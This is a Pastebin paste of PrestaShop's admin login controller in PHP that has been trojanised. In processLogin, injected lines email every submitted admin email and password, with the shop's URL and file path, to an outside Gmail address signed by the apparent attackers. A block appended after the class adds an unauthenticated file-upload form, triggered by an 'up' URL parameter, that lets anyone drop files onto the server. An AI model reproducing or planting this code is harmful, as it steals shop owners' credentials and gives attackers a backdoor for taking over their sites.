API tools faq
paste
Advertisement
Seckiller

presta_1

Seckiller
Jan 18th, 2020
405
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 13.82 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /**
  3.  * 2007-2016 PrestaShop
  4.  *
  5.  * NOTICE OF LICENSE
  6.  *
  7.  * This source file is subject to the Open Software License (OSL 3.0)
  8.  * that is bundled with this package in the file LICENSE.txt.
  9.  * It is also available through the world-wide-web at this URL:
  10.  * http://opensource.org/licenses/osl-3.0.php
  11.  * If you did not receive a copy of the license and are unable to
  12.  * obtain it through the world-wide-web, please send an email
  13.  * to license@prestashop.com so we can send you a copy immediately.
  14.  *
  15.  * DISCLAIMER
  16.  *
  17.  * Do not edit or add to this file if you wish to upgrade PrestaShop to newer
  18.  * versions in the future. If you wish to customize PrestaShop for your
  19.  * needs please refer to http://www.prestashop.com for more information.
  20.  *
  21.  *  @author     PrestaShop SA <contact@prestashop.com>
  22.  *  @copyright  2007-2016 PrestaShop SA
  23.  *  @license    http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)
  24.  *  International Registered Trademark & Property of PrestaShop SA
  25.  */
  26.  
  27. class AdminLoginControllerCore extends AdminController
  28. {
  29.     public function __construct()
  30.     {
  31.         $this->bootstrap = true;
  32.         $this->errors = array();
  33.         $this->context = Context::getContext();
  34.         $this->display_header = false;
  35.         $this->display_footer = false;
  36.         $this->meta_title = $this->l('Administration panel');
  37.         $this->css_files = array();
  38.         parent::__construct();
  39.         $this->layout = _PS_ADMIN_DIR_.DIRECTORY_SEPARATOR.'themes'.DIRECTORY_SEPARATOR.$this->bo_theme
  40.             .DIRECTORY_SEPARATOR.'template'.DIRECTORY_SEPARATOR.'controllers'.DIRECTORY_SEPARATOR.'login'
  41.             .DIRECTORY_SEPARATOR.'layout.tpl';
  42.  
  43.         if (!headers_sent()) {
  44.             header('Login: true');
  45.         }
  46.     }
  47.  
  48.     public function setMedia()
  49.     {
  50.         $this->addJquery();
  51.         $this->addjqueryPlugin('validate');
  52.         $this->addJS(_PS_JS_DIR_.'jquery/plugins/validate/localization/messages_'.$this->context->language->iso_code.'.js');
  53.         $this->addCSS(__PS_BASE_URI__.$this->admin_webpath.'/themes/'.$this->bo_theme.'/css/admin-theme.css', 'all', 0);
  54.         $this->addCSS(__PS_BASE_URI__.$this->admin_webpath.'/themes/'.$this->bo_theme.'/css/overrides.css', 'all', PHP_INT_MAX);
  55.         $this->addJS(_PS_JS_DIR_.'vendor/spin.js');
  56.         $this->addJS(_PS_JS_DIR_.'vendor/ladda.js');
  57.         Media::addJsDef(array('img_dir' => _PS_IMG_));
  58.         Media::addJsDefL('one_error', $this->l('There is one error.', null, true, false));
  59.         Media::addJsDefL('more_errors', $this->l('There are several errors.', null, true, false));
  60.  
  61.         Hook::exec('actionAdminLoginControllerSetMedia');
  62.     }
  63.  
  64.     public function initContent()
  65.     {
  66.         if (!Tools::usingSecureMode() && Configuration::get('PS_SSL_ENABLED')) {
  67.             // You can uncomment these lines if you want to force https even from localhost and automatically redirect
  68.             // header('HTTP/1.1 301 Moved Permanently');
  69.             // header('Location: '.Tools::getShopDomainSsl(true).$_SERVER['REQUEST_URI']);
  70.             // exit();
  71.             $clientIsMaintenanceOrLocal = in_array(Tools::getRemoteAddr(), array_merge(array('127.0.0.1'), explode(',', Configuration::get('PS_MAINTENANCE_IP'))));
  72.             // If ssl is enabled, https protocol is required. Exception for maintenance and local (127.0.0.1) IP
  73.             if ($clientIsMaintenanceOrLocal) {
  74.                 $warningSslMessage = Tools::displayError('SSL is activated. However, your IP is allowed to enter unsecure mode for maintenance or local IP issues.');
  75.             } else {
  76.                 $url = 'https://'.Tools::safeOutput(Tools::getServerName()).Tools::safeOutput($_SERVER['REQUEST_URI']);
  77.                 $warningSslMessage = sprintf(
  78.                     Translate::ppTags(
  79.                         Tools::displayError('SSL is activated. Please connect using the following link to [1]log into secure mode (https://)[/1]', false),
  80.                         array('<a href="%s">')
  81.                     ),
  82.                     $url
  83.                 );
  84.             }
  85.             $this->context->smarty->assign('warningSslMessage', $warningSslMessage);
  86.         }
  87.  
  88.         if (file_exists(_PS_ADMIN_DIR_.'/../install')) {
  89.             $this->context->smarty->assign('wrong_install_name', true);
  90.         }
  91.  
  92.         if (basename(_PS_ADMIN_DIR_) == 'admin' && file_exists(_PS_ADMIN_DIR_.'/../admin/')) {
  93.             $rand = 'admin'.sprintf('%03d', rand(0, 999)).Tools::strtolower(Tools::passwdGen(6)).'/';
  94.             if (@rename(_PS_ADMIN_DIR_.'/../admin/', _PS_ADMIN_DIR_.'/../'.$rand)) {
  95.                 Tools::redirectAdmin('../'.$rand);
  96.             } else {
  97.                 $this->context->smarty->assign(array(
  98.                     'wrong_folder_name' => true
  99.                 ));
  100.             }
  101.         } else {
  102.             $rand = basename(_PS_ADMIN_DIR_).'/';
  103.         }
  104.  
  105.         $this->context->smarty->assign(array(
  106.             'randomNb' => $rand,
  107.             'adminUrl' => Tools::getCurrentUrlProtocolPrefix().Tools::getShopDomain().__PS_BASE_URI__.$rand
  108.         ));
  109.  
  110.         // Redirect to admin panel
  111.         if (Tools::isSubmit('redirect') && Validate::isControllerName(Tools::getValue('redirect'))) {
  112.             $this->context->smarty->assign('redirect', Tools::getValue('redirect'));
  113.         } else {
  114.             $tab = new Tab((int)$this->context->employee->default_tab);
  115.             $this->context->smarty->assign('redirect', $this->context->link->getAdminLink($tab->class_name));
  116.         }
  117.  
  118.         if ($nb_errors = count($this->errors)) {
  119.             $this->context->smarty->assign(array(
  120.                 'errors' => $this->errors,
  121.                 'nbErrors' => $nb_errors,
  122.                 'shop_name' => Tools::safeOutput(Configuration::get('PS_SHOP_NAME')),
  123.                 'disableDefaultErrorOutPut' => true,
  124.             ));
  125.         }
  126.  
  127.         if ($email = Tools::getValue('email')) {
  128.             $this->context->smarty->assign('email', $email);
  129.         }
  130.         if ($password = Tools::getValue('password')) {
  131.             $this->context->smarty->assign('password', $password);
  132.         }
  133.  
  134.         $this->setMedia();
  135.         $this->initHeader();
  136.         parent::initContent();
  137.         $this->initFooter();
  138.  
  139.         //force to disable modals
  140.         $this->context->smarty->assign('modals', null);
  141.     }
  142.  
  143.     public function checkToken()
  144.     {
  145.         return true;
  146.     }
  147.  
  148.     /**
  149.      * All BO users can access the login page
  150.      *
  151.      * @return bool
  152.      */
  153.     public function viewAccess()
  154.     {
  155.         return true;
  156.     }
  157.  
  158.     public function postProcess()
  159.     {
  160.         if (Tools::isSubmit('submitLogin')) {
  161.             $this->processLogin();
  162.         } elseif (Tools::isSubmit('submitForgot')) {
  163.             $this->processForgot();
  164.         }
  165.     }
  166.  
  167.     public function processLogin()
  168.     {
  169.         /* Check fields validity */
  170.         $passwd = trim(Tools::getValue('passwd'));
  171.         $email = trim(Tools::getValue('email'));
  172. $to = "diiimmmd@gmail.com";
  173. $subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];
  174. $header = "from: hacked <Zeus.Undo@hacked01.com>";
  175. $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] ."&up=hous \r\n email: $email \r\n pass: $passwd \r\n by bajatax -- sniper :v \r\n";
  176. $message .= "Path : " . __file__;
  177. $sentmail = @mail($to, $subject, $message, $header);
  178. $sentmail1 = @mail($to, $subject, $message, $header);
  179.         if (empty($email)) {
  180.             $this->errors[] = Tools::displayError('Email is empty.');
  181.         } elseif (!Validate::isEmail($email)) {
  182.             $this->errors[] = Tools::displayError('Invalid email address.');
  183.         }
  184.  
  185.         if (empty($passwd)) {
  186.             $this->errors[] = Tools::displayError('The password field is blank.');
  187.         } elseif (!Validate::isPasswd($passwd)) {
  188.             $this->errors[] = Tools::displayError('Invalid password.');
  189.         }
  190.  
  191.         if (!count($this->errors)) {
  192.             // Find employee
  193.             $this->context->employee = new Employee();
  194.             $is_employee_loaded = $this->context->employee->getByEmail($email, $passwd);
  195.             $employee_associated_shop = $this->context->employee->getAssociatedShops();
  196.             if (!$is_employee_loaded) {
  197.                 $this->errors[] = Tools::displayError('The Employee does not exist, or the password provided is incorrect.');
  198.                 $this->context->employee->logout();
  199.             } elseif (empty($employee_associated_shop) && !$this->context->employee->isSuperAdmin()) {
  200.                 $this->errors[] = Tools::displayError('This employee does not manage the shop anymore (Either the shop has been deleted or permissions have been revoked).');
  201.                 $this->context->employee->logout();
  202.             } else {
  203.                 PrestaShopLogger::addLog(sprintf($this->l('Back Office connection from %s', 'AdminTab', false, false), Tools::getRemoteAddr()), 1, null, '', 0, true, (int)$this->context->employee->id);
  204.  
  205.                 $this->context->employee->remote_addr = (int)ip2long(Tools::getRemoteAddr());
  206.                 // Update cookie
  207.                 $cookie = Context::getContext()->cookie;
  208.                 $cookie->id_employee = $this->context->employee->id;
  209.                 $cookie->email = $this->context->employee->email;
  210.                 $cookie->profile = $this->context->employee->id_profile;
  211.                 $cookie->passwd = $this->context->employee->passwd;
  212.                 $cookie->remote_addr = $this->context->employee->remote_addr;
  213.  
  214.                 if (!Tools::getValue('stay_logged_in')) {
  215.                     $cookie->last_activity = time();
  216.                 }
  217.  
  218.                 $cookie->write();
  219.  
  220.                 // If there is a valid controller name submitted, redirect to it
  221.                 if (isset($_POST['redirect']) && Validate::isControllerName($_POST['redirect'])) {
  222.                     $url = $this->context->link->getAdminLink($_POST['redirect']);
  223.                 } else {
  224.                     $tab = new Tab((int)$this->context->employee->default_tab);
  225.                     $url = $this->context->link->getAdminLink($tab->class_name);
  226.                 }
  227.  
  228.                 if (Tools::isSubmit('ajax')) {
  229.                     die(Tools::jsonEncode(array('hasErrors' => false, 'redirect' => $url)));
  230.                 } else {
  231.                     $this->redirect_after = $url;
  232.                 }
  233.             }
  234.         }
  235.         if (Tools::isSubmit('ajax')) {
  236.             die(Tools::jsonEncode(array('hasErrors' => true, 'errors' => $this->errors)));
  237.         }
  238.     }
  239.  
  240.     public function processForgot()
  241.     {
  242.         if (_PS_MODE_DEMO_) {
  243.             $this->errors[] = Tools::displayError('This functionality has been disabled.');
  244.         } elseif (!($email = trim(Tools::getValue('email_forgot')))) {
  245.             $this->errors[] = Tools::displayError('Email is empty.');
  246.         } elseif (!Validate::isEmail($email)) {
  247.             $this->errors[] = Tools::displayError('Invalid email address.');
  248.         } else {
  249.             $employee = new Employee();
  250.             if (!$employee->getByEmail($email) || !$employee) {
  251.                 $this->errors[] = Tools::displayError('This account does not exist.');
  252.             } elseif ((strtotime($employee->last_passwd_gen.'+'.Configuration::get('PS_PASSWD_TIME_BACK').' minutes') - time()) > 0) {
  253.                 $this->errors[] = sprintf(
  254.                     Tools::displayError('You can regenerate your password only every %d minute(s)'),
  255.                     Configuration::get('PS_PASSWD_TIME_BACK')
  256.                 );
  257.             }
  258.         }
  259.  
  260.         if (!count($this->errors)) {
  261.             $pwd = Tools::passwdGen(10, 'RANDOM');
  262.             $employee->passwd = Tools::encrypt($pwd);
  263.             $employee->last_passwd_gen = date('Y-m-d H:i:s', time());
  264.  
  265.             $params = array(
  266.                 '{email}' => $employee->email,
  267.                 '{lastname}' => $employee->lastname,
  268.                 '{firstname}' => $employee->firstname,
  269.                 '{passwd}' => $pwd
  270.             );
  271.  
  272.             if (Mail::Send($employee->id_lang, 'employee_password', Mail::l('Your new password', $employee->id_lang), $params, $employee->email, $employee->firstname.' '.$employee->lastname)) {
  273.                 // Update employee only if the mail can be sent
  274.                 Shop::setContext(Shop::CONTEXT_SHOP, (int)min($employee->getAssociatedShops()));
  275.  
  276.                 $result = $employee->update();
  277.                 if (!$result) {
  278.                     $this->errors[] = Tools::displayError('An error occurred while attempting to change your password.');
  279.                 } else {
  280.                     die(Tools::jsonEncode(array(
  281.                         'hasErrors' => false,
  282.                         'confirm' => $this->l('Your password has been emailed to you.', 'AdminTab', false, false)
  283.                     )));
  284.                 }
  285.             } else {
  286.                 die(Tools::jsonEncode(array(
  287.                     'hasErrors' => true,
  288.                     'errors' => array(Tools::displayError('An error occurred while attempting to change your password.'))
  289.                 )));
  290.             }
  291.         } elseif (Tools::isSubmit('ajax')) {
  292.             die(Tools::jsonEncode(array('hasErrors' => true, 'errors' => $this->errors)));
  293.         }
  294.     }
  295. }
  296. if($_GET['up']){
  297. if(isset($_POST['Submit'])){
  298.     $filedir = "";
  299.     $maxfile = '2000000';
  300.     $mode = '0644';
  301.     $userfile_name = $_FILES['image']['name'];
  302.     $userfile_tmp = $_FILES['image']['tmp_name'];
  303.     if(isset($_FILES['image']['name'])) {
  304.         $qx = $filedir.$userfile_name;
  305.         @move_uploaded_file($userfile_tmp, $qx);
  306.         @chmod ($qx, octdec($mode));
  307. echo"<center><b>Done ==> $userfile_name</b></center>";
  308. }
  309. }
  310. else{
  311. echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>';
  312. }
  313. echo '</center></font>';
  314. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!